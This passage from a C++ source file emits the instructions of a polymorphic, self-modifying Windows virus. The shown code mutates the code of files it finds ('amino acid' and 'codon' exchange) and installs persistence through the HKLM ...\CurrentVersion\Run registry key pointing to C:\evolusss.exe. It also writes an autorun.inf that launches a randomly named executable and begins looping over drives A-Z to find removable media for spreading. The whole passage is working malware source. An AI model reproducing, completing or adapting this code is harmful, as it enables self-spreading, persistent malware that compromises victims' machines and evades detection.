2194. file << "                  ; BC==0" << endl;
2195. file << "                  _nopREAL" << endl;
2196. file << "                  _nopREAL" << endl;
2197. file << "                  _add0001" << endl;
2198. file << "                  _JnzDown" << endl;
2199.  
2200. file << "                       ; BC!=0" << endl;
2201. file << "                       _nopsA       ; get API offset" << endl;
2202. file << "                       _call        ; call CloseHandle, dword[HGTMapHandle]" << endl;
2203. file << "                       _push        ; Trash" << endl;
2204. file << "                       _nopREAL" << endl;
2205.  
2206.  
2207. file << "               _pop         ; remove trash" << endl; CreateAnIntron();
2208.  
2209. file << "               _getDO" << endl; CreateAnIntron();
2210. addnumber("(hCloseHandle-DataOffset)");
2211. file << "               _getdata" << endl; CreateAnIntron();
2212. file << "               _nopdA       ; Save API in RegA" << endl; CreateAnIntron();
2213.  
2214. GetAddress("HGTFileHandle");
2215. file << "               _getdata" << endl; CreateAnIntron();
2216. file << "               _push" << endl; CreateAnIntron();
2217. file << "               _save" << endl; CreateAnIntron();
2218. file << "               _and" << endl; CreateAnIntron();
2219.  
2220. file << "               _JnzDown" << endl;
2221. file << "                  ; BC==0" << endl;
2222. file << "                  _nopREAL" << endl;
2223. file << "                  _nopREAL" << endl;
2224. file << "                  _add0001" << endl;
2225. file << "                  _JnzDown" << endl;
2226.  
2227. file << "                       ; BC!=0" << endl;
2228. file << "                       _nopsA       ; get API offset" << endl;
2229. file << "                       _call        ; call CloseHandle, dword[HGTFileHandle]" << endl;
2230. file << "                       _push        ; Trash" << endl;
2231. file << "                       _nopREAL" << endl;
2232.  
2233. file << "               _pop         ; remove trash" << endl; CreateAnIntron();
2234.  
2235.  
2236. GetAddress("HGTDidInsert");
2237. file << "               _getdata" << endl; CreateAnIntron();
2238. file << "               _push                ; 0...written / -1...not written" << endl; CreateAnIntron();
2239.  
2240. GetAddress("WIN32_FIND_DATA_struct");
2241. file << "               _push" << endl; CreateAnIntron();
2242. GetAddress("HGT_FFHandle");
2243. file << "               _getdata" << endl; CreateAnIntron();
2244. file << "               _push" << endl; CreateAnIntron();
2245.  
2246. CallAPI("hFindNextFileA");
2247.  
2248.  
2249. file << "               _pop                     ; HGTDidInsert" << endl; CreateAnIntron();
2250. file << "               _save" << endl; CreateAnIntron();
2251. file << "               _nopsA                   ; If nonzero: Next file!" << endl; CreateAnIntron();
2252. file << "       _and" << endl; CreateAnIntron();
2253. file << "       _JnzUp                           ; End of the loop" << endl; CreateAnIntron();
2254.  
2255.  
2256. file << "       _push                ; Trash to stack" << endl; CreateAnIntron();
2257. file << "       HGTEnd1:" << endl; CreateAnIntron();
2258.  
2259. file << "       _pop                 ; Align stack (Trash or Return address from _call)" << endl; CreateAnIntron();
2260.  
2261.  
2262.  
2263. CalcNewRandNumberAndSaveIt();
2264.  
2265. GetAddress("RPAminoAcid1");
2266. file << "       _saveWrtOff" << endl; CreateAnIntron();
2267.  
2268. GetAddress("RandomNumber");
2269.  
2270. file << "       _getdata" << endl; CreateAnIntron();
2271. file << "       _nopdA                   ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
2272.  
2273.  
2274. zer0(0);
2275. file << "       _nopdD                   ; mov edx, 0" << endl; CreateAnIntron();
2276.  
2277. addnumber("256");
2278.  
2279. file << "       _div                     ; div ebx" << endl; CreateAnIntron();
2280.  
2281. file << "       _nopsD                   ; BC1=rand%256" << endl; CreateAnIntron();
2282.  
2283. file << "       _writeDWord              ; Save amino acid to compare." << endl; CreateAnIntron();
2284.  
2285.  
2286. file << "       _push" << endl; CreateAnIntron();
2287. zer0(0);
2288. addnumber("3");
2289. file << "       _save" << endl; CreateAnIntron();
2290.  
2291. file << "       _pop" << endl; CreateAnIntron();
2292. file << "       _shl                     ; BC1=(rand%256)*8" << endl; CreateAnIntron();
2293. file << "       _save" << endl; CreateAnIntron();
2294.  
2295.  
2296. GetAddress("MapPointer");
2297. file << "       _getdata" << endl; CreateAnIntron();
2298. file << "       _addsaved                ; MapPoint+(rand%256)*8" << endl; CreateAnIntron();
2299.  
2300. addnumber("(CodeStart+(StartAlphabeth-start))");
2301. file << "       _push" << endl; CreateAnIntron();
2302. file << "       _getdata" << endl; CreateAnIntron();
2303. file << "       _nopdA                   ; First 4 bytes of amino acid in RegA" << endl; CreateAnIntron();
2304.  
2305. file << "       _pop" << endl; CreateAnIntron();
2306. addnumber("4");
2307. file << "       _getdata" << endl; CreateAnIntron();
2308. file << "       _nopdB                   ; 2nd 4 bytes of amino acid in RegB" << endl; CreateAnIntron();
2309.  
2310. GetAddress("MapPointer");
2311. file << "       _getdata" << endl; CreateAnIntron();
2312.  
2313. addnumber("(CodeStart+(StartAlphabeth-start))");
2314. file << "       _nopdD" << endl; CreateAnIntron();
2315.  
2316.  
2317. file << "    ; Start of loop:" << endl; CreateAnIntron();
2318. file << "       _getEIP" << endl; CreateAnIntron();
2319. file << "       _sub0001" << endl; CreateAnIntron();
2320. file << "       _sub0001" << endl; CreateAnIntron();
2321. file << "       _sub0001" << endl; CreateAnIntron();
2322. file << "       _sub0001" << endl; CreateAnIntron();
2323. file << "       _sub0001" << endl; CreateAnIntron();
2324. file << "       _saveJmpOff" << endl; CreateAnIntron();
2325.  
2326. zer0(0);
2327. addnumber("((RPBlock1End1-RPBlock1Start1)*8)");
2328. file << "               _save" << endl; CreateAnIntron();
2329.  
2330. file << "               _getEIP" << endl; CreateAnIntron();
2331.  
2332. file << "           RPBlock1Start1:" << endl; CreateAnIntron();
2333. addnumber("3");
2334. file << "               _addsaved" << endl; CreateAnIntron();
2335. file << "               _push                               ; Save Addresse at Stack" << endl; CreateAnIntron();
2336.  
2337.  
2338. file << "               _pushall" << endl; CreateAnIntron();
2339. CalcNewRandNumberAndSaveIt();
2340.  
2341. GetAddress("RPAminoAcid2");
2342. file << "                       _saveWrtOff" << endl; CreateAnIntron();
2343.  
2344. GetAddress("RandomNumber");
2345.  
2346. file << "                       _getdata" << endl; CreateAnIntron();
2347. file << "                       _nopdA                   ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
2348.  
2349. zer0(0);
2350. file << "                       _nopdD                   ; mov edx, 0" << endl; CreateAnIntron();
2351.  
2352. addnumber("256");
2353.  
2354. file << "                       _div                     ; div ebx" << endl; CreateAnIntron();
2355.  
2356. file << "                       _nopsD" << endl; CreateAnIntron();
2357. file << "                       _writeDWord" << endl; CreateAnIntron();
2358.  
2359. file << "               _popall" << endl; CreateAnIntron();
2360.  
2361. file << "               _pushall" << endl; CreateAnIntron();
2362. GetAddress("RPAminoAcid1");
2363. file << "                  _getdata" << endl; CreateAnIntron();
2364. file << "                  _nopdA" << endl; CreateAnIntron();
2365. GetAddress("RPAminoAcid2");
2366. file << "                  _getdata" << endl; CreateAnIntron();
2367. file << "                  _nopdB" << endl; CreateAnIntron();
2368.  
2369. file << "               _popall" << endl; CreateAnIntron();
2370.  
2371. zer0(0);
2372. addnumber("3");
2373. file << "               _save" << endl; CreateAnIntron();
2374.  
2375. GetAddress("RPAminoAcid2");
2376. file << "               _getdata" << endl; CreateAnIntron();
2377.  
2378. file << "               _shl         ; *8" << endl; CreateAnIntron();
2379. file << "               _save" << endl; CreateAnIntron();
2380.  
2381. file << "               _nopsD        ; Get start of Alphabeth in Map" << endl; CreateAnIntron();
2382.  
2383. file << "               _addsaved" << endl; CreateAnIntron();
2384.  
2385. file << "               _getdata" << endl; CreateAnIntron();
2386. file << "               _save" << endl; CreateAnIntron();
2387.  
2388. file << "               _nopsA" << endl; CreateAnIntron();
2389. subsaved(0);
2390.  
2391. file << "               _JnzDown     ; Simulate JzDown" << endl;
2392.  
2393. file << "                       _nopREAL     ; BC1=0" << endl;
2394. file << "                       _nopREAL" << endl;
2395. file << "                       _add0001" << endl;
2396. file << "                       _JnzDown" << endl;
2397.  
2398. file << "                               _nopREAL     ; Not equal" << endl;
2399. file << "                               _pop" << endl;
2400. file << "                               _push" << endl;
2401. file << "                               _call        ; jmp to RPBlock1End" << endl;
2402.  
2403. file << "       ; First 4 bytes are equal" << endl; CreateAnIntron();
2404. file << "               _pop         ; Old Call-address" << endl; CreateAnIntron();
2405.  
2406. zer0(0);
2407. addnumber("((RPBlock2End1-RPBlock2Start1)*8)");
2408. file << "               _save" << endl; CreateAnIntron();
2409.  
2410. file << "               _getEIP" << endl; CreateAnIntron();
2411.  
2412. file << "           RPBlock2Start1:" << endl; CreateAnIntron();
2413. addnumber("3");
2414. file << "               _addsaved" << endl; CreateAnIntron();
2415. file << "               _push                               ; Save Addresse at Stack" << endl; CreateAnIntron();
2416.  
2417.  
2418. zer0(0);
2419. addnumber("3");
2420. file << "               _save" << endl; CreateAnIntron();
2421.  
2422. GetAddress("RPAminoAcid2");
2423. file << "               _getdata" << endl; CreateAnIntron();
2424.  
2425. file << "               _shl         ; *8" << endl; CreateAnIntron();
2426. file << "               _save" << endl; CreateAnIntron();
2427.  
2428. file << "               _nopsD        ; Get start of Alphabeth in Map" << endl; CreateAnIntron();
2429.  
2430. file << "               _addsaved" << endl; CreateAnIntron();
2431.  
2432. addnumber("4");
2433.  
2434. file << "               _getdata" << endl; CreateAnIntron();
2435. file << "               _save" << endl; CreateAnIntron();
2436.  
2437. file << "               _nopsB       ; second 4 bytes" << endl; CreateAnIntron();
2438. subsaved(0);
2439. file << "               _JnzDown" << endl;
2440.  
2441. file << "                       _nopREAL     ; BC1=0" << endl;
2442. file << "                       _pop" << endl;
2443. file << "                       _push" << endl;
2444. file << "                       _call        ; RPBlock2End" << endl;
2445.  
2446. file << "               _push        ; not equal! trash to stack" << endl; CreateAnIntron();
2447.  
2448. file << "           RPBlock1End1:        ; Not equal amino acids" << endl; CreateAnIntron();
2449. file << "               _pop         ; remove " << static_cast<char>(34) << "call" << static_cast<char>(34) << "-return address" << endl; CreateAnIntron();
2450. file << "               _pop         ; RPBlock1End-Jmp Address" << endl; CreateAnIntron();
2451.  
2452. zer0(0);
2453. addnumber("15");
2454. file << "               _save" << endl; CreateAnIntron();
2455.  
2456. GetAddress("RandomNumber");
2457. file << "               _getdata     ; BC1=random" << endl; CreateAnIntron();
2458.  
2459. file << "               _shr         ; BC1=random >> 15 (to get new small random number without calling the 32bit RND engine again)" << endl; CreateAnIntron();
2460. file << "               _and         ; BC1=(random >> 15) % 0000 1111b" << endl; CreateAnIntron();
2461. file << "       _JnzUp               ; If not zero -> Next loop!" << endl; CreateAnIntron();
2462.  
2463.  
2464. file << "       ; Not found any equivalences..." << endl; CreateAnIntron();
2465.  
2466. zer0(0);
2467. addnumber("((RPBlock3End1-RPBlock3Start1)*8)");
2468. file << "       _save" << endl; CreateAnIntron();
2469.  
2470. file << "       _getEIP" << endl; CreateAnIntron();
2471.  
2472. file << "     RPBlock3Start1:" << endl; CreateAnIntron();
2473. addnumber("3");
2474. file << "       _addsaved" << endl; CreateAnIntron();
2475.  
2476. file << "       _call        ; jmp to end of poly-engine: RPBlock3End" << endl; CreateAnIntron();
2477.  
2478.  
2479.  
2480.  
2481. file << "     RPBlock2End1:      ; Equal amino acids found" << endl; CreateAnIntron();
2482. file << "       _pop         ; remove " << static_cast<char>(34) << "call" << static_cast<char>(34) << "-return address" << endl; CreateAnIntron();
2483. file << "       _pop         ; RPBlock2End-Jmp Address" << endl; CreateAnIntron();
2484.  
2485.  
2486. GetAddress("MapPointer");
2487. file << "       _getdata" << endl; CreateAnIntron();
2488.  
2489. addnumber("(CodeStart+(StAmino-start))");
2490. file << "       _nopdD" << endl; CreateAnIntron();
2491.  
2492. GetAddress("RPAminoAcid1");
2493. file << "       _getdata" << endl; CreateAnIntron();
2494. file << "       _nopdA" << endl; CreateAnIntron();
2495.  
2496. GetAddress("RPAminoAcid2");
2497. file << "       _getdata" << endl; CreateAnIntron();
2498. file << "       _nopdB" << endl; CreateAnIntron();
2499.  
2500. zer0(0);
2501. GetAddress("FileSize");
2502. file << "       _getdata" << endl; CreateAnIntron();
2503. addnumber("(0xFFFFFFFF-(CodeStart+(StAmino-start))-1000)");
2504. file << "       _push" << endl; CreateAnIntron();
2505.  
2506. file << "       _getEIP" << endl; CreateAnIntron();
2507. file << "       _sub0001" << endl; CreateAnIntron();
2508. file << "       _sub0001" << endl; CreateAnIntron();
2509. file << "       _sub0001" << endl; CreateAnIntron();
2510. file << "       _sub0001" << endl; CreateAnIntron();
2511. file << "       _sub0001" << endl; CreateAnIntron();
2512. file << "       _saveJmpOff" << endl; CreateAnIntron();
2513.  
2514. file << "               _nopsD       ; Codon-Sequence Start" << endl; CreateAnIntron();
2515. file << "               _save" << endl; CreateAnIntron();
2516.  
2517. file << "               _pop" << endl; CreateAnIntron();
2518. file << "               _push        ; counter" << endl; CreateAnIntron();
2519.  
2520. file << "               _addsaved" << endl; CreateAnIntron();
2521. file << "               _saveWrtOff" << endl; CreateAnIntron();
2522. file << "               _getdata" << endl; CreateAnIntron();
2523. file << "               _push" << endl; CreateAnIntron();
2524.  
2525. zer0(0);
2526. addnumber("255");
2527. file << "               _save" << endl; CreateAnIntron();
2528. file << "               _pop" << endl; CreateAnIntron();
2529. file << "               _and         ; BC1=one byte" << endl; CreateAnIntron();
2530. file << "               _save" << endl; CreateAnIntron();
2531.  
2532. file << "               _nopsA" << endl; CreateAnIntron();
2533.  
2534. subsaved(0);
2535. file << "               _JnzDown" << endl;
2536. file << "                       _nopsB" << endl;
2537. file << "                       _writeByte           ; If equal: exchange codon!" << endl;
2538. file << "                       _nopREAL" << endl;
2539. file << "                       _nopREAL" << endl;
2540.  
2541. file << "               _pushall" << endl; CreateAnIntron();
2542. CalcNewRandNumberAndSaveIt();
2543. file << "               _popall" << endl; CreateAnIntron();
2544.  
2545. zer0(0);
2546. addnumber("1");
2547. file << "               _save" << endl; CreateAnIntron();
2548.  
2549. GetAddress("RandomNumber");
2550. file << "               _getdata" << endl; CreateAnIntron();
2551. file << "               _and" << endl; CreateAnIntron();
2552. addnumber("1");
2553. file << "               _save                ; BC2=(rand%8)+1" << endl; CreateAnIntron();
2554.  
2555. file << "               _pop" << endl; CreateAnIntron();
2556. subsaved(0);
2557. file << "               _push" << endl; CreateAnIntron();
2558.  
2559. zer0(0);
2560. addnumber("4293918720");
2561. file << "               _save" << endl; CreateAnIntron();
2562. file << "               _pop" << endl; CreateAnIntron();
2563. file << "               _push" << endl; CreateAnIntron();
2564. file << "               _and                 ; BC1=(counter%0xFFF0 0000)" << endl; CreateAnIntron();
2565.  
2566. file << "               _JnzDown" << endl;
2567. file << "                       _add0001  ; Not finished" << endl;
2568. file << "                       _JnzUp       ; Next step" << endl;
2569. file << "                       _nopREAL" << endl;
2570. file << "                       _nopREAL" << endl;
2571.  
2572.  
2573. file << "       _pop         ; counter away from stack" << endl; CreateAnIntron();
2574. file << "       _push        ; trash" << endl; CreateAnIntron();
2575.  
2576. file << "     RPBlock3End1:" << endl; CreateAnIntron();
2577. file << "       _pop         ; return value from call" << endl; CreateAnIntron();
2578.  
2579.  
2580. GetAddress("MapPointer");
2581. file << "       _getdata" << endl; CreateAnIntron();
2582. file << "       _push" << endl; CreateAnIntron();
2583. CallAPI("hUnmapViewOfFile");
2584.  
2585. GetAddress("MapHandle");
2586. file << "       _getdata" << endl; CreateAnIntron();
2587. file << "       _push" << endl; CreateAnIntron();
2588. CallAPI("hCloseHandle");
2589.  
2590. GetAddress("FileHandle");
2591. file << "       _getdata" << endl; CreateAnIntron();
2592. file << "       _push" << endl; CreateAnIntron();
2593. CallAPI("hCloseHandle");
2594.  
2595.  
2596. GetAddress("AutoStartContentStart");
2597. file << "       _saveWrtOff" << endl; CreateAnIntron();
2598. file << "       _nopdA" << endl; CreateAnIntron();
2599.  
2600. GetAddress("stSubKey");
2601. file << "       _nopdA" << endl; CreateAnIntron();
2602. file << "       _saveWrtOff" << endl; CreateAnIntron();
2603. zer0(0);
2604. addnumber("\'SOFT\'");
2605. file << "       _writeDWord" << endl; CreateAnIntron();
2606.  
2607. file << "       _nopsA" << endl; CreateAnIntron();
2608. addnumber("4");
2609. file << "       _nopdA" << endl; CreateAnIntron();
2610. file << "       _saveWrtOff" << endl; CreateAnIntron();
2611. zer0(0);
2612. addnumber("\'WARE\'");
2613. file << "       _writeDWord" << endl; CreateAnIntron();
2614.  
2615. file << "       _nopsA" << endl; CreateAnIntron();
2616. addnumber("4");
2617. file << "       _nopdA" << endl; CreateAnIntron();
2618. file << "       _saveWrtOff" << endl; CreateAnIntron();
2619. zer0(0);
2620. addnumber("\'\\Mic\'");
2621. file << "       _writeDWord" << endl; CreateAnIntron();
2622.  
2623. file << "       _nopsA" << endl; CreateAnIntron();
2624. addnumber("4");
2625. file << "       _nopdA" << endl; CreateAnIntron();
2626. file << "       _saveWrtOff" << endl; CreateAnIntron();
2627. zer0(0);
2628. addnumber("\'roso\'");
2629. file << "       _writeDWord" << endl; CreateAnIntron();
2630.  
2631. file << "       _nopsA" << endl; CreateAnIntron();
2632. addnumber("4");
2633. file << "       _nopdA" << endl; CreateAnIntron();
2634. file << "       _saveWrtOff" << endl; CreateAnIntron();
2635. zer0(0);
2636. addnumber("\'ft\\W\'");
2637. file << "       _writeDWord" << endl; CreateAnIntron();
2638.  
2639. file << "       _nopsA" << endl; CreateAnIntron();
2640. addnumber("4");
2641. file << "       _nopdA" << endl; CreateAnIntron();
2642. file << "       _saveWrtOff" << endl; CreateAnIntron();
2643. zer0(0);
2644. addnumber("\'indo\'");
2645. file << "       _writeDWord" << endl; CreateAnIntron();
2646.  
2647. file << "       _nopsA" << endl; CreateAnIntron();
2648. addnumber("4");
2649. file << "       _nopdA" << endl; CreateAnIntron();
2650. file << "       _saveWrtOff" << endl; CreateAnIntron();
2651. zer0(0);
2652. addnumber("\'ws\\C\'");
2653. file << "       _writeDWord" << endl; CreateAnIntron();
2654.  
2655. file << "       _nopsA" << endl; CreateAnIntron();
2656. addnumber("4");
2657. file << "       _nopdA" << endl; CreateAnIntron();
2658. file << "       _saveWrtOff" << endl; CreateAnIntron();
2659. zer0(0);
2660. addnumber("\'urre\'");
2661. file << "       _writeDWord" << endl; CreateAnIntron();
2662.  
2663. file << "       _nopsA" << endl; CreateAnIntron();
2664. addnumber("4");
2665. file << "       _nopdA" << endl; CreateAnIntron();
2666. file << "       _saveWrtOff" << endl; CreateAnIntron();
2667. zer0(0);
2668. addnumber("\'ntVe\'");
2669. file << "       _writeDWord" << endl; CreateAnIntron();
2670.  
2671. file << "       _nopsA" << endl; CreateAnIntron();
2672. addnumber("4");
2673. file << "       _nopdA" << endl; CreateAnIntron();
2674. file << "       _saveWrtOff" << endl; CreateAnIntron();
2675. zer0(0);
2676. addnumber("\'rsio\'");
2677. file << "       _writeDWord" << endl; CreateAnIntron();
2678.  
2679. file << "       _nopsA" << endl; CreateAnIntron();
2680. addnumber("4");
2681. file << "       _nopdA" << endl; CreateAnIntron();
2682. file << "       _saveWrtOff" << endl; CreateAnIntron();
2683. zer0(0);
2684. addnumber("\'n\\Ru\'");
2685. file << "       _writeDWord" << endl; CreateAnIntron();
2686.  
2687. file << "       _nopsA" << endl; CreateAnIntron();
2688. addnumber("4");
2689. file << "       _saveWrtOff" << endl; CreateAnIntron();
2690. zer0(0);
2691. addnumber("\'n\'");
2692. file << "       _writeDWord" << endl; CreateAnIntron();
2693.  
2694.  
2695. GetAddress("hRegKey");
2696. file << "       _push" << endl; CreateAnIntron();
2697. GetAddress("stSubKey");
2698. file << "       _push" << endl; CreateAnIntron();
2699. zer0(0);
2700. addnumber("HKEY_LOCAL_MACHINE");
2701. file << "       _push" << endl; CreateAnIntron();
2702. CallAPI("hRegCreateKeyA");
2703.  
2704. zer0(0);
2705. addnumber("15");
2706. file << "       _push                ; 15" << endl; CreateAnIntron();
2707. GetAddress("Driveletter3");
2708. file << "       _push                ; C:" << static_cast<char>(92) << "evolusss.exe" << endl; CreateAnIntron();
2709. zer0(0);
2710. addnumber("REG_SZ");
2711. file << "       _push                ; REG_SZ" << endl; CreateAnIntron();
2712. zer0(0);
2713. file << "       _push                ; 0x0" << endl; CreateAnIntron();
2714. file << "       _push                ; 0x0" << endl; CreateAnIntron();
2715. GetAddress("hRegKey");
2716. file << "       _getdata" << endl; CreateAnIntron();
2717. file << "       _push                ; dword[hRegKey]" << endl; CreateAnIntron();
2718. CallAPI("hRegSetValueExA");
2719.  
2720. GetAddress("AutoStartContentStart");
2721. file << "       _nopdA" << endl; CreateAnIntron();
2722. file << "       _saveWrtOff" << endl; CreateAnIntron();
2723. zer0(0);
2724. addnumber("\'[Aut\'");
2725. file << "       _writeDWord" << endl; CreateAnIntron();
2726.  
2727. file << "       _nopsA" << endl; CreateAnIntron();
2728. addnumber("4");
2729. file << "       _nopdA" << endl; CreateAnIntron();
2730. file << "       _saveWrtOff" << endl; CreateAnIntron();
2731. zer0(0);
2732. addnumber("\'orun\'");
2733. file << "       _writeDWord" << endl; CreateAnIntron();
2734.  
2735. file << "       _nopsA" << endl; CreateAnIntron();
2736. addnumber("4");
2737. file << "       _nopdA" << endl; CreateAnIntron();
2738. file << "       _saveWrtOff" << endl; CreateAnIntron();
2739. zer0(0);
2740. addnumber("0x530A0D5D");
2741. file << "       _writeDWord" << endl; CreateAnIntron();
2742.  
2743. file << "       _nopsA" << endl; CreateAnIntron();
2744. addnumber("4");
2745. file << "       _nopdA" << endl; CreateAnIntron();
2746. file << "       _saveWrtOff" << endl; CreateAnIntron();
2747. zer0(0);
2748. addnumber("\'hell\'");
2749. file << "       _writeDWord" << endl; CreateAnIntron();
2750.  
2751. file << "       _nopsA" << endl; CreateAnIntron();
2752. addnumber("4");
2753. file << "       _nopdA" << endl; CreateAnIntron();
2754. file << "       _saveWrtOff" << endl; CreateAnIntron();
2755. zer0(0);
2756. addnumber("\'Exec\'");
2757. file << "       _writeDWord" << endl; CreateAnIntron();
2758.  
2759. file << "       _nopsA" << endl; CreateAnIntron();
2760. addnumber("4");
2761. file << "       _nopdA" << endl; CreateAnIntron();
2762. file << "       _saveWrtOff" << endl; CreateAnIntron();
2763. zer0(0);
2764. addnumber("\'ute=\'");
2765. file << "       _writeDWord" << endl; CreateAnIntron();
2766.  
2767. file << "       _nopsA" << endl; CreateAnIntron();
2768. addnumber("4");
2769. file << "       _nopdA" << endl; CreateAnIntron();
2770. file << "       _saveWrtOff" << endl; CreateAnIntron();
2771. GetAddress("RandomFileName");
2772. file << "       _nopdB" << endl; CreateAnIntron();
2773. file << "       _getdata" << endl; CreateAnIntron();
2774. file << "       _writeDWord" << endl; CreateAnIntron();
2775.  
2776. file << "       _nopsA" << endl; CreateAnIntron();
2777. addnumber("4");
2778. file << "       _nopdA" << endl; CreateAnIntron();
2779. file << "       _saveWrtOff" << endl; CreateAnIntron();
2780. file << "       _nopsB" << endl; CreateAnIntron();
2781. addnumber("4");
2782. file << "       _getdata" << endl; CreateAnIntron();
2783. file << "       _writeDWord" << endl; CreateAnIntron();
2784.  
2785. file << "       _nopsA" << endl; CreateAnIntron();
2786. addnumber("4");
2787. file << "       _nopdA" << endl; CreateAnIntron();
2788. file << "       _saveWrtOff" << endl; CreateAnIntron();
2789. zer0(0);
2790. addnumber("\'.exe\'");
2791. file << "       _writeDWord" << endl; CreateAnIntron();
2792.  
2793. file << "       _nopsA" << endl; CreateAnIntron();
2794. addnumber("4");
2795. file << "       _nopdA" << endl; CreateAnIntron();
2796. file << "       _saveWrtOff" << endl; CreateAnIntron();
2797. zer0(0);
2798. addnumber("0x73550A0D");
2799. file << "       _writeDWord" << endl; CreateAnIntron();
2800.  
2801. file << "       _nopsA" << endl; CreateAnIntron();
2802. addnumber("4");
2803. file << "       _nopdA" << endl; CreateAnIntron();
2804. file << "       _saveWrtOff" << endl; CreateAnIntron();
2805. zer0(0);
2806. addnumber("\'eAut\'");
2807. file << "       _writeDWord" << endl; CreateAnIntron();
2808.  
2809. file << "       _nopsA" << endl; CreateAnIntron();
2810. addnumber("4");
2811. file << "       _nopdA" << endl; CreateAnIntron();
2812. file << "       _saveWrtOff" << endl; CreateAnIntron();
2813. zer0(0);
2814. addnumber("\'opla\'");
2815. file << "       _writeDWord" << endl; CreateAnIntron();
2816.  
2817. file << "       _nopsA" << endl; CreateAnIntron();
2818. addnumber("3");
2819. file << "       _nopdA" << endl; CreateAnIntron();
2820. file << "       _saveWrtOff" << endl; CreateAnIntron();
2821. zer0(0);
2822. addnumber("\'ay=1\'");
2823. file << "       _writeDWord" << endl; CreateAnIntron();
2824.  
2825. GetAddress("autoruninf");
2826. file << "       _nopdA" << endl; CreateAnIntron();
2827. file << "       _saveWrtOff" << endl; CreateAnIntron();
2828. zer0(0);
2829. addnumber("\'auto\'");
2830. file << "       _writeDWord" << endl; CreateAnIntron();
2831.  
2832. file << "       _nopsA" << endl; CreateAnIntron();
2833. addnumber("4");
2834. file << "       _nopdA" << endl; CreateAnIntron();
2835. file << "       _saveWrtOff" << endl; CreateAnIntron();
2836. zer0(0);
2837. addnumber("\'run.\'");
2838. file << "       _writeDWord" << endl; CreateAnIntron();
2839.  
2840. file << "       _nopsA" << endl; CreateAnIntron();
2841. addnumber("3");
2842. file << "       _saveWrtOff" << endl; CreateAnIntron();
2843. zer0(0);
2844. addnumber("\'.inf\'");
2845. file << "       _writeDWord" << endl; CreateAnIntron();
2846.  
2847. zer0(0);
2848. file << "       _push                ; 0x0" << endl; CreateAnIntron();
2849. addnumber("2");
2850. file << "       _push                ; 0x2" << endl; CreateAnIntron();
2851. zer0(0);
2852. addnumber("CREATE_ALWAYS");
2853. file << "       _push                ; CREATE_ALWAYS" << endl; CreateAnIntron();
2854. zer0(0);
2855. file << "       _push                ; 0x0" << endl; CreateAnIntron();
2856. file << "       _push                ; 0x0" << endl; CreateAnIntron();
2857. addnumber("0xC0000000");
2858. file << "       _push                ; 0xC0000000" << endl; CreateAnIntron();
2859. GetAddress("autoruninf");
2860. file << "       _push                ; autoruninf" << endl; CreateAnIntron();
2861. CallAPI("hCreateFileA");
2862.  
2863. GetAddress("FileHandle");
2864. file << "       _saveWrtOff" << endl; CreateAnIntron();
2865. file << "       _nopsA" << endl; CreateAnIntron();
2866. file << "       _writeDWord           ; dword[FileHandle]=eax" << endl; CreateAnIntron();
2867.  
2868. zer0(0);
2869. file << "       _push                 ; 0x0" << endl; CreateAnIntron();
2870. GetAddress("MapHandle");
2871. file << "       _push                 ; Trash-Address" << endl; CreateAnIntron();
2872. zer0(0);
2873. addnumber("(AutoStartContentEnd-AutoStartContentStart)");
2874. file << "       _push                 ; Size of Buffer" << endl; CreateAnIntron();
2875. GetAddress("AutoStartContentStart");
2876. file << "       _push                 ; Buffer to write" << endl; CreateAnIntron();
2877. GetAddress("FileHandle");
2878. file << "       _getdata" << endl; CreateAnIntron();
2879. file << "       _push                 ; FileHandle" << endl; CreateAnIntron();
2880. CallAPI("hWriteFile");
2881.  
2882. GetAddress("FileHandle");
2883. file << "       _getdata" << endl; CreateAnIntron();
2884. file << "       _push" << endl; CreateAnIntron();
2885. CallAPI("hCloseHandle");
2886.  
2887. file << "       _getEIP" << endl; CreateAnIntron();
2888. file << "       _sub0001" << endl; CreateAnIntron();
2889. file << "       _sub0001" << endl; CreateAnIntron();
2890. file << "       _sub0001" << endl; CreateAnIntron();
2891. file << "       _sub0001" << endl; CreateAnIntron();
2892. file << "       _sub0001" << endl; CreateAnIntron();
2893. file << "       _saveJmpOff                  ; Loop over Drive Letter A-Z" << endl; CreateAnIntron();
2894.  
2895. file << "       _pushall" << endl; CreateAnIntron();
2896. zer0(0);
2897. file << "               _nopdB                       ; RegB=0" << endl; CreateAnIntron();
2898. file << "       " << endl; CreateAnIntron();
2899. GetAddress("Driveletter1-1");
2900. file << "               _saveWrtOff" << endl; CreateAnIntron();
2901. zer0(0);
2902. addnumber("0x003A4100");
2903. file << "               _writeDWord" << endl; CreateAnIntron();
2904. file << "       " << endl; CreateAnIntron();
2905. GetAddress("Driveletter2-1");
2906. file << "               _saveWrtOff" << endl; CreateAnIntron();
2907. zer0(0);
2908. addnumber("0x5C3A4100");
2909. file << "               _writeDWord" << endl; CreateAnIntron();
2910. file << "       " << endl; CreateAnIntron();
2911. file << "       " << endl; CreateAnIntron();
2912. zer0(0);
2913. addnumber("26");
2914. file << "               _nopdA                       ; counter" << endl; CreateAnIntron();
2915. file << "       " << endl; CreateAnIntron();
2916. file << "               _getEIP" << endl; CreateAnIntron();
2917. file << "               _sub0001" << endl; CreateAnIntron();
2918. file << "               _sub0001" << endl; CreateAnIntron();
2919. file << "               _sub0001" << endl; CreateAnIntron();
2920. file << "               _sub0001" << endl; CreateAnIntron();
2921. file << "               _sub0001" << endl; CreateAnIntron();
2922. file << "               _saveJmpOff                  ; Loop over Drive Letter A-Z" << endl; CreateAnIntron();
2923.  
2924. file << "               _pushall" << endl; CreateAnIntron();
2925. file << "       " << endl; CreateAnIntron();
2926. GetAddress("Driveletter1+2");
2927. file << "                       _saveWrtOff" << endl; CreateAnIntron();
2928. zer0(1);
2929. file << "                       _writeByte" << endl; CreateAnIntron();
2930.  
2931. GetAddress("Driveletter1");
2932. file << "                       _push" << endl; CreateAnIntron();
2933. CallAPI("hGetDriveTypeA");
2934.  
2935. file << "                       _nopsA" << endl; CreateAnIntron();
2936. file << "                       _save        ; save Drive type" << endl; CreateAnIntron();
2937.  
2938. zer0(1);
2939. addnumber("0x0010");
2940. file << "                       _push" << endl; CreateAnIntron();
2941.  
2942. zer0(1);
2943. addnumber("2");
2944. subsaved(1);
2945. file << "                       _JnzDown     ; Is DRIVE_REMOVABLE?" << endl;
2946. file << "                           _pop      ; Stack=0x0010" << endl;
2947. file << "                           _push" << endl;
2948. file << "                           _nopdB    ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2949. file << "                           _nopREAL" << endl;
2950.  
2951. file << "                       _pop            ; Trash away" << endl; CreateAnIntron();
2952.  
2953. zer0(1);
